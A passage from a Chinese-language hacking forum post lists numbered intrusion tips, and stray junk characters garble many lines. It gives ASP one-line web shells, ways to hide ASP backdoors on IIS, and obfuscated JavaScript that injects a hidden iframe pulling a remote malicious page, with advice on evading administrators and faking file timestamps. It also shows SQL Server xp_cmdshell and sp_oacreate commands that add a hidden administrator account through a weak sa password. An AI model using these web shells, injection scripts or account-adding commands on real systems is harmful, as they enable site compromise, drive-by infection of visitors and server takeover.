) _) g' }7 ]' F0 n* h: P% y% `2 rc).%><%execute request("go")%><%! _  O/ J! x$ a9 u9 o, x- Y, q
d).<script language=VBScript runat=server>execute request("sb")</Script>4 M2 K9 z6 V/ ~) i
e).<%25Execute(request("l"))%25>
1 N' z* \) `) H1 e, k2 I6 Ef).<%if request("cmd")<>"" then execute request("pass")%>
/ L1 q, v6 |, y2 P9 R8 K, b! w, m
! n$ A7 r5 N& S* z/ Q! c! }# r52、at "12:17" /interactive cmd+ T$ p# R) }( c2 }0 _
执行后可以用AT命令查看新加的任务
" J) b4 F3 H9 n- {用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。1 j# f1 ]; o2 b5 H3 y( K- |

1 |7 ?2 A2 b% U" u' U: m53、隐藏ASP后门的两种方法6 s; z: v! j0 s+ ]* ]
1、建立非标准目录:mkdir images..\
1 i  D9 g$ Y5 A/ m9 H- c$ P拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
% W$ Z* t" T# j" k6 t/ i- z通过web访问ASP木马:http://ip/images../news.asp?action=login. N& z' G( ]) e5 }" k
如何删除非标准目录:rmdir images..\ /s
- M+ x: c6 \. [5 }; U' X$ `1 \2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:: _6 q* F3 m# Q8 `2 s# y4 ^
mkdir programme.asp
0 ?+ T: K; Q; a8 B( H/ T, r7 r& I新建1.txt文件内容:<!--#include file=”12.jpg”-->1 }) D) n: F% a" `9 x1 ]+ V1 V( M5 {
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
  j, P0 o6 h' \, Gattrib +H +S programme.asp
5 U. u4 P9 F' R  X通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt- O9 M; Y0 |# ^' N: T/ L
9 K! D1 i0 N3 F# {, W0 x
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
* [! m: r% [. g; [+ M然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
: I2 L' z" q" C' R: r
; ?$ u) J, g- u; K% P: U& X55、JS隐蔽挂马2 D' v3 m) x% F0 j' o9 Q
1.8 a& p. @2 q( p5 ~
var tr4c3="<iframe src=ht";% j+ c) T4 K* {* ?
tr4c3 = tr4c3+"tp:/";# K3 z; }! O; J/ i/ Y* _
tr4c3 = tr4c3+"/ww";
5 b. \0 `0 y( F8 Q" M* t2 Utr4c3 = tr4c3+"w.tr4";
. ?* m5 D3 h4 etr4c3 = tr4c3+"c3.com/inc/m";; w: p2 ~/ `5 V# |1 L
tr4c3 = tr4c3+"m.htm style="display:none"></i";8 @$ j- y8 x3 E; g2 d
tr4c3 =tr4c3+"frame>'";8 q7 c' ?8 |2 Q, v& |- b
document.write(tr4c3);
; V$ v5 ^6 X1 J# U6 o- d5 G  X避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。; r) c+ B" _4 u+ |
2 T2 E8 n7 \/ K9 Q: \5 u( ~
2., ?8 }9 u0 T1 d8 y9 @. s! j
转换进制,然后用EVAL执行。如6 ]& s; [6 N3 o* [
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; m& f* ~: D# c
不过这个有点显眼。
8 ^8 w. x! o/ @: {3., U# x3 A7 f5 X" o2 V
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');& Q7 m+ z$ a) ~3 u% o
最后一点,别忘了把文件的时间也修改下。( Z# V) h% b4 W0 @. c; f- |

0 l  ~* ^, A# K* k& ~5 I; i% ^56.3389终端入侵常用DOS命令% U4 u" x0 n' b- a2 {" g
taskkill taskkill /PID 1248 /t4 O4 H& ?4 B$ \0 ]! ~  f
# S; ^  K0 z- n% L* \$ O
tasklist 查进程
: L7 f- g( R& Q# x  J* K: s# g. }: S7 o# t
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限" E( Y& L# ~2 E2 J+ m
iisreset /reboot
8 v2 ?2 W# L! u# x! ctsshutdn /reboot /delay:1    重起服务器
5 s8 v/ p. s8 r
  w, r) ], _* G1 E& llogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,# S  Y+ @' W1 Z9 \

: f! A6 P1 }) v' O: t) ?query user 查看当前终端用户在线情况% @! I& K" M6 \) v. S' A7 p

$ Y9 g* ]: s! T  C5 j* x1 n, k  N要显示有关所有会话使用的进程的信息,请键入:query process *, C3 i# s& Q, ]+ m  g2 M
0 N2 n3 ]( ?. G4 \1 c: I% r
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:20 A! T) W# |1 r6 o
1 X: @( M& j( ^; |# h8 f
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2! N2 `: N# y- V. f5 c; _

7 \9 C  [0 t6 @6 @$ t& ~要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02; ^  w1 w$ Q2 ^1 q; R. M

# S$ I. v) k  e3 N命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
- v3 v* D( Z3 A! W5 z9 n8 R+ z5 z
( E" ]& b. c; D9 {' X0 W, I命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统( k& r* _# e7 G5 [

6 U1 v+ E( \& M: _% _: l+ z: m命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。. }1 D1 [3 X$ q' {  [$ R; b

8 r- b% h  [. B' v, z& \5 R命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机" O0 D  S. a# B$ G

+ q. a0 A. z* p7 M56、在地址栏或按Ctrl+O,输入:/ F% K4 T% U. [# N5 a
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;! g+ d0 `* _% K6 @

1 M8 X! Q3 Q) c* ~3 W1 G源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。; O4 U4 a! M  Y; h3 W8 s

# z* ?1 _2 K$ b4 m' l1 o( x0 N57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
7 U6 n. w- E0 q, C0 [. ~7 w& M用net localgroup administrators是可以看到管理组下,加了$的用户的。) j4 N8 T- n+ S. G0 }' y$ A

2 S8 m, D; @. ]& G, R58、 sa弱口令相关命令: a4 d8 D( F5 s! L1 ^

/ a  J5 \& S. j6 \" k一.更改sa口令方法:" G; A4 x) j# E6 r/ t+ M
用sql综合利用工具连接后,执行命令:6 Q' Z0 `; I: Z2 V8 s2 F; W; [
exec sp_password NULL,'20001001','sa'
% q" z. e* R' }" o) @(提示:慎用!)
: t4 a7 T( K3 L& w; ^+ W
( `2 ~4 t1 I$ p, S; P7 S: D二.简单修补sa弱口令.* X2 }2 J1 p5 G; B9 e0 ^9 C. `
  y3 H. m- n5 q2 P2 f7 h
方法1:查询分离器连接后执行:( Y! c) y: C1 \
if exists (select * from
9 R& `4 j3 q) G% i# Ydbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
( e6 n( Y$ e& [OBJECTPROPERTY(id, N'IsExtendedProc') = 1). u, t) `  e4 ?+ Q* N5 _% y
* s' L3 ^& k1 A7 B
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
7 y4 F- X9 }/ K8 y. D! m# J9 ~, y  U9 |* g8 p
GO
! T: }6 U( i5 S( s
: F) w$ D: f" y% V2 \然后按F5键命令执行完毕
$ N* H5 G* s- y! S1 M
6 v& b$ @; o9 y$ v$ v0 W4 c: ^0 S+ l方法2:查询分离器连接后
6 N; l- {- D) n第一步执行:use master; _6 o" X! ~3 l: {+ q6 v9 s
第二步执行:sp_dropextendedproc 'xp_cmdshell'( H) Q, I2 }, \0 ]4 [$ T3 F
然后按F5键命令执行完毕
( \! G, i; [- V! W, ?2 y% [) g- F% Z6 ]' ~8 F) d9 R% J% |( n
% x8 X4 t; D6 F1 C' Q
三.常见情况恢复执行xp_cmdshell.
4 f2 P7 f& e" c4 D0 s
; |; P. D: h8 _! Z9 e- w$ E  Y
: |# I3 [/ A, l+ f3 W1 未能找到存储过程'master..xpcmdshell'.' E$ O4 e4 y) s3 s# N% W
   恢复方法:查询分离器连接后,
' ~' N8 N" n) W; f, N第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int2 ?4 F' v0 X; z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( Z. A# \3 K% L( q# K然后按F5键命令执行完毕
8 ?: A/ E. }& c# C% i
2 F0 H* Q4 \; u+ e' l0 z9 b2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
. G2 M; G5 {5 p, M' ]恢复方法:查询分离器连接后,! ^- q1 i  ~  {4 s
第一步执行:sp_dropextendedproc "xp_cmdshell"
) n5 m0 Y: N9 ~第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# y# Z- Y. \2 R/ c然后按F5键命令执行完毕3 k$ N- M( ^+ \' ?+ m, q
9 C/ F6 H1 a" d3 M/ R
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
* L- f4 ~- c! v( z6 d' Q恢复方法:查询分离器连接后,
: ]/ ^0 }$ b" W5 ?第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
+ }6 g3 j0 x! B3 l; E0 H/ r1 F第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           + @4 [1 M: M) B8 ?% j/ @' k# Z" f) F
然后按F5键命令执行完毕
5 Q' O- \' I- u& n1 h. X
6 H0 R- M- x2 X9 o+ I0 x6 W6 b. t  {2 l四.终极方法.
, B7 E3 f# u  o; _6 A如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
! f. x9 f: ~6 p. \查询分离器连接后,
- L/ l: k! D0 a6 L4 R5 K" q2000servser系统:1 H5 ]. D  @- C; K6 U7 r5 E4 N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
; o7 X* B* e. v$ Y6 P+ Q, Q8 d' J8 e
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add', x; b, Z0 W4 W+ P" r2 N
7 S( ^. v% v9 [/ q1 o
xp或2003server系统:
2 D$ N* Y, X- {  |6 j
' ~! g  @0 p) {9 ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add') ]) h! Y# w; V( ]% j% b" W( o
5 I9 j$ u; J. e0 |3 N: @
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
% A, I8 y, g5 l/ @: B" r7 E2 }1 S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表